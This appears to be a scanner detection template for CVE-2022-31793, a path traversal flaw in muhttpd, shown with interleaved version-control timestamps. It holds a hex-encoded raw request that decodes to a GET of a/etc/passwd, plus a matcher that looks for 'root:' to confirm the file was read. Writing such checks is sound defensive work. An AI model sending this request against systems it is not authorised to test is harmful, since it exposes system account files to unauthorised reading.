2022-07-31 11:26:56 +00:00
id : CVE-2022-31793
info :
name : muhttpd <= 1.1.5 - Path traversal
author : scent2d
2022-07-31 13:50:22 +00:00
severity : unknown
2022-07-31 11:26:56 +00:00
description : |
A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
reference :
- https://derekabdine.com/blog/2022-arris-advisory.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
2022-08-04 08:46:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31793
tags : cve,cve2022,muhttpd,lfi,unauth
2022-07-31 11:26:56 +00:00
network :
- host :
2022-07-31 13:50:22 +00:00
- "{{Hostname}}"
2022-07-31 11:26:56 +00:00
inputs :
2022-07-31 13:50:22 +00:00
- data : "47455420612F6574632F706173737764"
2022-07-31 11:26:56 +00:00
type : hex
- data : "\n\n"
read-size : 128
matchers :
- type : word
encoding : hex
words :
2022-07-31 13:50:22 +00:00
- "726f6f743a"
part : body
